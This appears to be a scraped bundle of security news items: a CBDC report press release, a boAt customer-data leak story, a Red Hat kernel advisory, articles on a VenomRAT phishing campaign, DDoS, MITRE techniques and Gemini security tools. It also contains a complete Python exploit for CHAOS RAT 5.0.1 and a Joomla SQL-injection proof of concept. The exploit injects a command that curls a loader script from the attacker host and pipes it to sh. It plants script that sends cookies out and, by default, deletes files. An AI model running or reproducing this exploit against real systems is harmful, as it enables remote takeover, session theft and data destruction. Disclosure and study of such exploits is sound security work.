By Cyber Newswire
Match Systems, a leading authority in crypto crimes investigations and crypto AML solutions provider, has published a comprehensive…
This is a post from HackRead.com Read the original post: Match Systems report on consequences of CBDC implementation, led by CEO Andrei Kutin

Match Systems, a leading authority in crypto crimes investigations and crypto AML solutions provider, has published a comprehensive analytical report examining the potential implications of Central Bank Digital Currency (CBDC) implementation.

In a landscape where the debate between cryptocurrency proponents and CBDC advocates intensifies, Kutin’s report offers a balanced perspective on the advantages and drawbacks of transitioning to a digital currency framework.

The report delves into the nuanced dynamics surrounding CBDC adoption, shedding light on its multifaceted impacts on financial systems, governments, businesses, and individuals.

Kutin’s insights come at a critical juncture, as the rise in crypto fraud and the sophistication of asset theft methods prompt a reevaluation of traditional stances. While crypto activists often oppose CBDC implementation, Kutin’s analysis highlights the shifting attitudes within the industry towards embracing regulatory measures for enhanced safety and accountability.

“The dichotomy between free cryptocurrencies and centralized CBDCs presents society with two extremes,” remarks Andrei Kutin. “The optimal solution likely lies in a middle ground, where governments establish unified global standards for cryptocurrency circulation, safeguarding individuals while preserving economic autonomy.”

The full analytical report, titled “Analyzing the Prospects for CBDC Implementation,” is now available for public access on the Match Systems website.

****About Match Systems:****

Match Systems is a company specializing in AML services, blockchain investigations, and implementation of compliance procedures for cryptocurrency projects around the world.

****Contact****

**Joseph Anderson**  
**Match Systems**  
**\[email protected\]**

Match Systems report on consequences of CBDC implementation, led by CEO Andrei Kutin

In a cyberattack more reminiscent of the 2010s, a seemingly lone hacker fleeced a major corporation for millions of open customer records.

Source: Jade Kelly via Alamy Stock Photo

A hacker with no known history has leaked personal information belonging to millions of customers of boAt, a consumer electronics company in India.

The company is India's leading manufacturer of wireless audio and wearables; boAt controlled around 26% of the wearables market as of 2023, according to data from IDC. It sells nearly 40% of all earbuds in the country — more than five times its nearest competitor — according to 2022 data from Counterpoint Research.

The threat actors, operating under the nom de guerre "ShopifyGUY," on April 5 published 2GB worth of files onto the Dark Web, according to reports. The files contained around 7.5 million entries' worth of personally identifiable information (PII) relating to boAt customers, including names, addresses, phone numbers, emails, and more.

The entire lot of it was listed for around only $2, potentially raising suspicion about the data's authenticity. However, multiple news outlets have since contacted samples of affected customers, confirming that their information is correct.

Dark Reading has reached out to boAt's security team to confirm the details of the attack but has not yet received a response.

**Preventing Customer Data Leaks**

To prevent falling victim to such an attack, Darren Williams, CEO and founder of BlackFog, suggests that companies invest in anti-exfiltration tools.

"Anti-data exfiltration is about looking for data leaving the network, and then running AI over the top of all of it to look for if it's a legitimate request," he explains. Programs trained to do this job run on dozens of contextual and behavioral parameters to distinguish legitimate from illegitimate traffic.

With that said, he adds, there are even simpler and lower-tech steps companies can take to make simple leaks more complicated.

"In a mature organization," he explains, "a basic requirement of security is data encryption at rest. That way, if somebody's accessing your database, it doesn't matter, because they can't decrypt it anyway. So it fascinates me that, in this day and age, people don't do the very basic step of encrypting their database.

"It's not hard — it takes 30 seconds, you just have to press the On button. It makes me think \[boAt\] was asleep at the wheel."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Attack on Consumer Electronics Manufacturer boAt Leaks Data on 7.5M Customers

CHAOS RAT web panel version 5.0.1 is vulnerable to command injection, which can be triggered from a cross site scripting attack, allowing an attacker to takeover the RAT server.

    # Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https://github.com/tiagorlampert/CHAOS# Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30850, CVE-2024-31839# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server# Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc# Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/import timeimport requestsimport threadingimport jsonimport websocketimport http.clientimport argparseimport sysimport refrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServerclass Collector(BaseHTTPRequestHandler):    def __init__(self, ip, port, target, command, video_name, *args, **kwargs):        self.ip = ip        self.port = port        self.target = target        self.shell_command = command        self.video_name = video_name         super().__init__(*args, **kwargs)    def do_GET(self):        if self.path == "/loader.sh":            self.send_response(200)            self.end_headers()            command = str.encode(self.shell_command)            self.wfile.write(command)        elif self.path == "/video.mp4":            with open(self.video_name, 'rb') as f:                self.send_response(200)                self.send_header('Content-type', 'video/mp4')                self.end_headers()                self.wfile.write(f.read())        else:            cookie = self.path.split("=")[1]            self.send_response(200)            self.end_headers()            self.wfile.write(b"")            background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))            background_thread.start()def convert_to_int_array(string):    int_array = []    for char in string:        int_array.append(ord(char))    return int_arraydef extract_client_info(path):    with open(path, 'rb') as f:        data = str(f.read())    address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"    address_pattern = re.compile(address_regexp)    address = address_pattern.findall(data)[0].split("=")[1]    port_regexp = r"main\.Port=\d{1,6}"    port_pattern = re.compile(port_regexp)    port = port_pattern.findall(data)[0].split("=")[1]    jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"    jwt_pattern = re.compile(jwt_regexp)    jwt = jwt_pattern.findall(data)[0].split("=")[1]    return f"{address}:{port}", jwtdef keep_connection(target, cookie, hostname, username, os_name, mac, ip):    print("Spoofing agent connection")    headers = {            "Cookie": f"jwt={cookie}"    }    while True:        data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}        r = requests.get(f"http://{target}/health", headers=headers)        r = requests.post(f"http://{target}/device", headers=headers, json=data)        time.sleep(30)def handle_command(target, cookie, mac, ip, port):    print("Waiting to serve malicious command outupt")    headers = {        "Cookie": f"jwt={cookie}",        "X-Client": mac    }    ws = websocket.WebSocket()    ws.connect(f'ws://{target}/client', header=headers)    while True:        response = ws.recv()        command = json.loads(response)['command']        data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}        ws.send_binary(json.dumps(data))def run_exploit(cookie, target, ip, port):    print(f"Exploiting {target} with JWT {cookie}")    conn = http.client.HTTPConnection(target)    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',        'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',        'Cookie': f'jwt={cookie}'    }    conn.request(        'POST',        '/generate',        f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',        headers    )def run(ip, port, target, command, video_name):    server_address = (ip, int(port))    collector = partial(Collector, ip, port, target, command, video_name)    httpd = HTTPServer(server_address, collector)    print(f'Server running on port {ip}:{port}')    httpd.serve_forever()if __name__ == "__main__":    parser = argparse.ArgumentParser()    subparsers = parser.add_subparsers(dest="option")    exploit = subparsers.add_parser("exploit")    exploit.add_argument("-f", "--file",  help="The path to the CHAOS client")    exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")    exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")    exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")    exploit.add_argument("-j", "--jwt", help="The JWT token to use")    exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)    exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)    exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")    exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")    exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")    exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")    exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")    extract = subparsers.add_parser("extract")    extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)    args = parser.parse_args()    if args.option == "exploit":        if args.target != None and args.jwt != None:            target = args.target            jwt = args.jwt        elif args.file != None:            target, jwt = extract_client_info(args.file)        else:            exploit.print_help(sys.stderr)            sys.exit(1)        bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))        bg.start()        cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))        cmd.start()        server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))        server.start()    elif args.option == "extract":        target, jwt = extract_client_info(args.file)        print(f"CHAOS server: {target}\nJWT: {jwt}")    else:        parser.print_help(sys.stderr)        sys.exit(1)

CHAOS RAT 5.0.1 Remote Command Execution

Joomla SP Page Builder component version 5.2.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : SP Page Builder 5.2.7 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               || # Vendor    : https://extensions.joomla.org/extension/sp-page-builder/                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 <===== inject here[+] http://127.0.0.1/cdgi36fr/index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Joomla SP Page Builder 5.2.7 SQL Injection

Red Hat Security Advisory 2024-1746-03 - An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1746.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2024:1746-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1746Issue date:         2024-04-10Revision:           03CVE Names:          CVE-2022-42896====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)* Kernel: bluetooth: Unauthorized management command execution (CVE-2023-2002)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-42896References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2147364https://bugzilla.redhat.com/show_bug.cgi?id=2187308https://bugzilla.redhat.com/show_bug.cgi?id=2237757

Red Hat Security Advisory 2024-1746-03

Various anti-detection features, including the use of the ScrubCrypt antivirus-evasion tool, fuel an attack that aims to take over Microsoft Windows machines.

Source: Shane in Sweden via Shutterstock

A newly exposed corporate phishing campaign targeting Microsoft Windows users is delivering a flurry of remote access Trojans (RATs) and other malware under the cover of multiple detection-evasion techniques.

The attackers behind the campaign try to lure users into clicking on an attachment that ultimately employs the tool ScrubCrypt to deliver primarily the VenomRAT version 6, although various other oft-used malware also are associated with the campaign, researchers from Fortinet's FortiGuard Labs Threat Research revealed in a blog post.

While the RAT maintains a connection with attackers' command-and-control (C2) server, the attack drops plug-ins including Remcos RAT, XWorm, NanoCore RAT, and a stealer designed for specific crypto wallets, according to the researchers.

Ultimately the campaign is aimed at stealing critical data from targeted systems — ostensibly to be used in future attacks — as well achieving persistence on a victim's network, according to the post.

"The attackers employ a variety of methods, including phishing emails with malicious attachments, obfuscated script files, and Guloader PowerShell, to infiltrate and compromise victim systems," wrote Cara Lin, senior antivirus analyst at Fortinet. "Furthermore, deploying plugins through different payloads highlights the versatility and adaptability of the attack campaign."

VenomRAT is a tool used previously by the 8220 Gang, a cybercriminal group that uses a powerful botnet as its weapon of choice. ScrubCrypt, meanwhile, converts executables into undetectable batch files, providing "several options to manipulate malware, making it more challenging for antivirus products to detect," Lin noted.

**Phony Invoice Phish**

The campaign typically starts with a phishing email stating that a shipment has been delivered with an attached "invoice" that is actually an SVG file named "INV0ICE\_#TBSBVS0Y3BDSMMX.svg" and contains embedded base64-encoded data.

If a targeted user opens the SVG file, the ECMAScript creates a new blob and utilizes "window.URL.createObjectURL" to drop the decoded data as a ZIP file named "INV0ICE\_#TBSBVS0Y3BDSMMX.zip." The decompressed file reveals an obfuscated batch file with an embedded payload that appears to be created by the BatCloak tool, which distributes malware while effectively evading detection by antivirus program, Lin explained.

The embedded script initially copies a PowerShell execution file to "C:\\Users\\Public\\xkn.exe" and utilizes the copied file in later commands, using parameters that conceal its activity. It then decodes the malicious data and saves it as "pointer.png," which is later executed as "pointer.cmd" and deletes all the previously executed files.

**ScrubCrypt Delivers VenomRAT**

The "pointer.cmd" file serves as the ScrubCrypt batch file, and it's "deliberately cluttered with numerous junk strings to obscure readability," Lin wrote. The file incorporates two payloads, the first of which serves two primary purposes: establishing persistence and loading the targeted malware, VenomRAT. The second payload from the ScrubCrypt batch file is for AMSI bypass and ETW bypass, she noted.

VenomRAT was first identified in 2020 and uses a modified version of the well-known Quasar RAT. It allows attackers to gain unauthorized access and control over targeted systems. "As with other RATs, VenomRAT enables attackers to manipulate compromised devices remotely, allowing them to execute various malicious activities without the victim's knowledge or consent," Lin wrote.

Once deployed, VenomRAT initiates communication with its C2 server to send information about the victim, such as hardware specifications, username, operating system details, camera availability, execution path, foreground window name, and the name of the antivirus product installed. It then maintains communication channels with the C2 server to acquire the aforementioned additional plugins for related and other malicious activities as the attack continues from there, Lin wrote.

Notable among those plugins are three RATs often used for various nefarious purposes, including the Remcos RAT, which gives attackers complete system control to capture keystrokes, screenshots, credentials, and other sensitive information; NanoCore RAT, which can remotely access and control a victim's computer; and Xworm, which can load ransomware or act as a persistent backdoor.

**Vigilance Required**

Because this cyberattack campaign uses multiple layers of obfuscation and evasion techniques, it's important for enterprises to stay vigilant.

"The attackers' ability to persist in the system, evade detection, and execute malicious payloads underscores the importance of robust cybersecurity measures and vigilant monitoring to mitigate such threats effectively," Lin noted.

Organizations should educate users about the hallmark signs of phishing campaigns and encourage them to report suspicious activity to IT departments, as well as avoid downloading files or clicking on links from untrusted sources.

Despite its evasive tactics, a strong antivirus-detection system should pick up the malware entering a network, and one that includes a content disarm-and-reconstruction service also is helpful to disable the malicious macros in the document before they can do any harm, Lin wrote.

Fortiguard included a list of indicators of compromise for the specific VenomRAT campaign in the post, including associated C2 domains, URLs associated with the attack, and files the attack distributes.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Cagey Phishing Campaign Delivers Multiple RATs to Steal Windows Data

Global organizations and geopolitical entities must adopt new strategies to combat the growing sophistication in attacks that parallel the complexities of our new geopolitical reality.

Source: Dragon Claws via Alamy Stock Photo

COMMENTARY

Today, it's rare for a month to pass without reports of new distributed denial-of-service (DDoS) attacks driven by geopolitical instability. Now, a single attack can include numerous countries and networks. While the war between Russia and Ukraine and elections in NATO countries like Poland drive geopolitically focused DDoS attacks, it's important to understand that these threats were present long before these conflicts, and will be around long after. But why are these attacks against governmental institutions so prominent, and why do they impact all of us in the first place? 

That is partially because changes in political leadership often correlate directly with a spike in DDoS attacks. For example, in Poland, DDoS attack volume increased fourfold within days of its new government being sworn into office. These spikes often result from hacktivist groups (e.g., KillNet, Noname057, Anonymous Sudan) opposing the viewpoints of newly elected officials. They impact the rest of us because DDoS attacks must cross multiple Internet service providers (ISPs) to reach the intended victim. 

Unfortunately, even an attack that is effectively mitigated will use up valuable resources on any ISP network it reaches. We refer to this as the "DDoS tax," which increases the cost of network operation, making it more expensive for everyone. In fact, global ISPs reported a 500% global increase in HTTP/S application layer attacks since 2019, and 17% growth in DNS reflection/amplification volumes in the first half of 2023. Furthermore, it is alarming that carpet-bombing attacks, a technique that simultaneously targets entire IP address ranges, increased by 110% from the first to the second half of 2022, with most attacks occurring against ISP networks.

The bottom line is that there is no escape from DDoS attacks on governmental institutions, and threat intelligence needs to be taken more seriously because of how universal the threat can be when it comes to compromising global ISP networks and additional IT infrastructure. Therefore, it is key for governmental entities to suppress DDoS attacks before they can begin.

**Comprehensive and Adaptive Defenses for Evolving DDoS Attacks**

With nation-states, bad actors often directly target Internet infrastructure to take out critical communications, ecommerce, and other vital infrastructure dependent on Internet connectivity. That means attackers target ISP networks to purposefully degrade Internet connectivity. Further, these bad actors typically have vastly more resources at their disposal than other attackers. They constantly innovate and explore new and more powerful DDoS attack vectors, evidenced by the creation of new ones every year, such as DNS Water Torture and Carpet Bombing. All the while, as DDoS defenses become more effective, bad actors continue to sidestep these defenses with new DDoS attack vectors and methodologies. These advanced techniques invariably find their way into the hands of criminal gangs and even individual hackers, who turn them against any entity from whom they can profit.

With the increased persistence of cybercriminals and the growth in complexity of DDoS attacks, the foundation for a comprehensive DDoS protection solution should identify and stop all types of DDoS attacks before they impact the availability of business-critical services. With today's growing frequency and complexity of DDoS attacks, a multilayer defense strategy is now no longer nice to have, but a requirement. New techniques such as adaptive DDoS strategies, which change vectors based on the defense that is presented, reinforce the need for better agility and efficiency when it comes to managing these increasingly complex attacks.

In the end, threat actors will continue using DDoS attacks as a way to further disrupt and inflame sociopolitical tensions around the world. Security professionals need to consider both local and international conflicts when assessing the DDoS risk factors associated with nation-state attacks. The unfortunate reality is that bad actors continue to find new ways to orchestrate attacks through evolving methodologies. As such, global organizations and geopolitical entities must adopt new strategies right now, such as advanced DDoS defense and suppression, to combat this growing sophistication in attacks that parallel the complexities of our new geopolitical reality.

**About the Author(s)**

Director, Security Solutions, Netscout

Gary is an industry veteran, bringing over 20 years of broad technology experience including routing and switching, wireless, mobility, collaboration, and cloud but always with a focus on security. His previous roles include solutions architect, security SME, sales engineering, consultancy, product management, IT and customer support. Prior to joining Netscout in 2012, he spent 12 years at Cisco Systems and held positions with Avaya and Cable & Wireless.

How Nation-State DDoS Attacks Impact Us All

Find out what sensitive data of yours is exposed online today with our new, free Digital Footprint Portal.

Digital security is about so much more than malware. That wasn’t always the case. 

When I started Malwarebytes more than 16 years ago, malware was the primary security concern—the annoying pop-ups, the fast-spreading viruses, the catastrophic worms—and throughout our company’s history, Malwarebytes routinely excelled against this threat. We caught malware that other vendors missed, and we pioneered malware detection methods beyond the signature-based industry standard.  

I’m proud of our success, but it wasn’t just our technology that got us here. It was our attitude.  

At Malwarebytes, we believe that everyone has the right to a secure digital life, no matter their budget, which is why our malware removal tool was free when it launched and remains free today. Our ad blocking tool, Browser Guard is also available to all without a charge. This was very much _not_ the norm in cybersecurity, but I believe it was—and will always be—the right thing to do.  

Today, I am proud to add to our legacy of empowering individuals regardless of their wallet by releasing a new, free tool that better educates and prepares people for modern threats that abuse exposed data to target online identities. I’d like to welcome everyone to try our new Digital Footprint Portal.  

See your exposed data in our new Digital Footprint Portal.

By simply entering an email address, anyone can discover what information of theirs is available on the dark web to hackers, cybercriminals, and scammers. From our safe portal, everyday people can view past password breaches, active social media profiles, potential leaks of government ID info, and more.  

More than a decade ago, Malwarebytes revolutionized the antivirus industry by prioritizing the security of all individuals. Today, Malwarebytes is now also revolutionizing digital life protection by safeguarding the data that serves as the backbone of your identity, your privacy, your reputation, and your well-being online.  

****Why data matters** **

I can’t tell you how many times I’ve read that “data is the new oil” without reading any explanations as to why people should care.  

Here’s my attempt at clarifying the matter: Too much of our lives are put online without our control.  

Creating a social media account requires handing over your full name and birthdate. Completing any online shopping order requires detailing your address and credit card number. Getting approved for a mortgage requires the exchange of several documents that reveal your salary and your employer. Buying a plane ticket could necessitate your passport info. Messaging your doctor could involve sending a few photos that you’d like to keep private.  

As we know, a lot of this data is valuable to advertisers—this is what pundits focus on when they invoke the value of “oil” in discussing modern data collection—but this data is also valuable to an entirely separate group that has learned to abuse private information in novel and frightening ways: Cybercriminals.  

Long ago, cybercriminals would steal your username and password by fooling you with an urgently worded phishing email. Today, while this tactic is still being used, there’s a much easier path to data theft. Cybercriminals can simply buy your information on the dark web.  

That information can include credit card numbers—where the risk of financial fraud is obvious—and even more regulated forms of identity, like Social Security Numbers and passport info. Equipped with enough forms of “proof,” online thieves can fool a bank into routing your money elsewhere or trick a lender into opening a new line of credit in your name.  

Where the risk truly lies, however, is in fraudulent account access.  

If you’ve ever been involved in a company’s data breach (which is extremely likely), there’s a chance that the username and password that were associated with that data breach can be bought on the dark web for just pennies. Even though each data breach involves just one username and password for each account, cybercriminals know that many people frequently reuse passwords across multiple accounts. After illegally purchasing your login credentials that were exposed in one data breach, thieves will use those same credentials to try to log into more popular, sensitive online accounts, like your online banking, your email, and your social media.  

If any of these attempts at digital safe-cracking works, the potential for harm is enormous.  

With just your email login and password, cybercriminals can ransack photos that are stored in an associated cloud drive and use those for extortion. They can search for attachments that reveal credit card numbers, passport info, and ID cards and then use that information to fool a bank into letting them access your funds. They can pose as you in bogus emails and make fraudulent requests for money from your family and friends. They can even change your password and lock you out forever. 

This is the future of personal cybercrime, and as a company committed to stopping cyberthreats everywhere, we understand that we have a role to play in protecting people.  

We will always stop malware. We will always advise to create and use unique passwords and multifactor authentication. But today, we’re expanding our responsibility and helping you truly see the modern threats that could leverage your data.  

With the Digital Footprint Portal, who you are online is finally visible to you—not just cybercriminals. Use it today to understand where your data has been leaked, what passwords have been exposed, and how you can protect yourself online.  

****Digitally safe** **

Malwarebytes and the cybersecurity industry at large could not have predicted today’s most pressing threats against online identities and reputations, but that doesn’t mean we get to ignore them. The truth is that Malwarebytes was founded with a belief broader than anti-malware protection. Malwarebytes was founded to keep people safe.  

As cybercriminals change their tactics, as scammers needle their way onto online platforms, and as thieves steal and abuse the sensitive data that everyone places online, Malwarebytes will always stay one step ahead. The future isn’t about worms, viruses, Trojans, scams, pig butchering, or any other single scam. It’s about holistic digital life protection. We’re excited to help you get there.

 Introducing the Digital Footprint Portal 

A cheat sheet for all of the most common techniques hackers use, and general principles for stopping them.

Source: Kristoffer Tripplaar via Alamy Stock Photo

Of the hundreds of documented MITRE ATT&CK techniques, two dominate the field: command and scripting interpreters (T1059) and phishing (T1566).

In a report published on April 10, D3 Security analyzed more than 75,000 recent cybersecurity incidents. Its goal was to determine which methods of attack were most common.

The results paint a stark picture: those two techniques outpaced all others by orders of magnitude, with the top technique outpacing the runner-up by a factor of three.

For defenders looking to allocate limited attention and resources, here are just some of the most common ATT&CK techniques, and how to defend against them.

**Execution: Command and Scripting Interpreter (Used in 52.22% of Attacks)**

What it is: Attackers write scripts in popular languages like PowerShell and Python for two primary purposes. Most commonly, they're used to automate malicious tasks such as harvesting data or downloading and extracting a payload. They're also useful for evading detection — bypassing antivirus solutions, extended detection and response (XDR), and the like.

That these scripts are far and away No. 1 on this list is extra surprising to Adrianna Chen, D3's vice president of product and service. "Since Command and Scripting Interpreter (T1059) falls under the Execution tactic, it is in the middle stage of the MITRE ATT&CK kill chain," she says. "So, it is fair to assume that other techniques from earlier tactics have already gone undetected by the time that it's detected by the EDR tool. Given that this one technique was so prominent in our data set, it underscores the importance of having processes to trace back to the origin of an incident."

How to defend against it: Because malicious scripts are diverse and multifaceted, dealing with them requires a thorough incident response plan that combines detection of potentially malicious behaviors with strict watch over privileges and script execution policies.

**Initial Access: Phishing (15.44%)**

What it is: Phishing and its subcategory, spear-phishing (T1566.001-004), are the first and third most common ways attackers gain access to targeted systems and networks. Using the first in general campaigns and the second when aiming for specific individuals or organizations, the goal is to coerce victims into divulging crucial information that will allow a foothold into sensitive accounts and devices.

How to defend against it: Even the smartest and most educated among us fall for sophisticated social engineering. Frequent education and awareness campaigns can go some ways toward protecting employees from themselves and the companies they provide a window into.

**Initial Access: Valid Accounts (3.47%)**

What it is: Often, successful phishing allows attackers access to legitimate accounts. These accounts provide keys to otherwise locked doors, and cover for their various misdeeds.

How to defend against it: When employees inevitably click on that malicious PDF or URL, robust multifactor authentication (MFA) can, if nothing else, act as more hoops for attackers to jump through. Anomaly detection tools can also help if, for example, a strange user connects from a faraway IP address, or simply does something they aren't expected to do.

**Credential Access: Brute Force (2.05%)**

What it is: A more popular option back in the olden days, brute force attacks have stuck around thanks to the ubiquity of weak, reused, and unchanged passwords. Here, attackers use scripts that automatically run through username and password combinations — such as in a dictionary attack — to gain access to desired accounts.

How to defend against it: No item on this list is as easily and wholly preventable as brute-force attacks. Using strong enough passwords fixes the problem on its own, full stop. Other little mechanisms, like locking out a user after repeated login attempts, also do the trick.

**Persistence: Account Manipulation (1.34%)**

What it is: Once an attacker has used phishing, brute force, or some other means to access a privileged account, they can then leverage that account to cement their position in a targeted system. For example, they can change the account's credentials to lock out its original owner, or possibly adjust permissions in order to access even more privileged resources than they already have.

How to defend against it: To mitigate the damage from an account compromise, D3 recommends organizations implement stringent restrictions for accessing sensitive resources, and follow the principle of least privileged access: granting no more than the minimum level of access necessary for any user to perform his or her job.

Besides that, it offers a number of recommendations that can apply to this and other MITRE techniques, including:

*   Maintaining vigilance through continuous monitoring of logs to detect and respond to any suspicious account activities
    
*   Operating under the assumption that the network has already been compromised and adopting proactive measures to mitigate potential damage
    
*   Streamlining response efforts by automating countermeasures upon detection of confirmed security breaches, ensuring swift and effective mitigation
    

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Top MITRE ATT&amp;CK Techniques and How to Defend Against Them

Google has integrated Mandiant's security offerings into its AI platform to detect, stop, and remediate cybersecurity attacks as quickly as possible.

Source: Klaus Ohlenschlaeger via Alamy Stock Photo

Gemini now has security capabilities: Google has integrated Mandiant's security offerings into its artificial intelligence (AI) platform, the company announced during its Google Cloud Next conference in Las Vegas.

The new capabilities are automated security agents that use generative AI to detect, stop, and remediate cybersecurity attacks as quickly as possible and to to analyze code to find security problems. The agents will assist security operations teams by increasing the speed of investigations.

"Security agents will help you in every stage of the security life cycle, from prevention, detection and response," said Google Cloud CEO Thomas Kurian during a keynote speech at the event.

The security offerings are built around Google's Gemini large language model, which is also being used to summarize documents and generate images. The new security features use generative AI to analyze code to find security problems. Security analysts can run deep queries to get to the root cause of problems and seek answers. The technology will also better explain findings so companies can take action to neutralize threats.

Google is betting its future on AI products such as Gemini, which it introduced earlier this year. Gemini is already being integrated into search and productivity applications. Mandiant's offerings include threat detection and security operations, and Gemini adds AI capabilities to cover detection, analysis, and prevention.

**Using AI to Understand Attacks**

One of the new products, Gemini in Threat Intelligence, uses natural language prompts to get deep insight about malicious behavior.

"We're able to take the experience and intelligence we gather from protecting Google's own services, combine it with Mandiant's leading, frontline insight from their work in incident response to show emerging threats, the severity, and risk factors," Kurian said.

The intelligent threat offers ties into the next product, Gemini in Security Operations, which relies on AI to improve the speed to address threats from malicious behavior. It can also be used to summarize and explain findings, recommend next steps, and put remediation playbooks in action.

Gemini can recommend actions based on factors such as detection rules, and provide recommendations for faster response times.

"Analysts can now ask Gemini for the latest threat intelligence from Mandiant directly in-line — including any indicators of compromise found in their environment — and Gemini will navigate users to the most relevant pages in the integrated platform for deeper investigation," Google wrote in a blog post.

The offering uses Gemini 1.5 Pro's AI capabilities to analyze large samples of potential malicious code or malware, the interaction between modules, and to reveal their true malicious intent, Kurian said.

The final product announced was Gemini in Security Command Center, which evaluates a security posture, provides findings, and summarizes attack paths, which helps companies remediate cloud risks.

"We've leveraged tremendous amounts of machine learning, precision AI, generative AI, to make sure our customers are able to detect, stop, and remediate all cybersecurity attacks as quickly as possible," Kurian said.

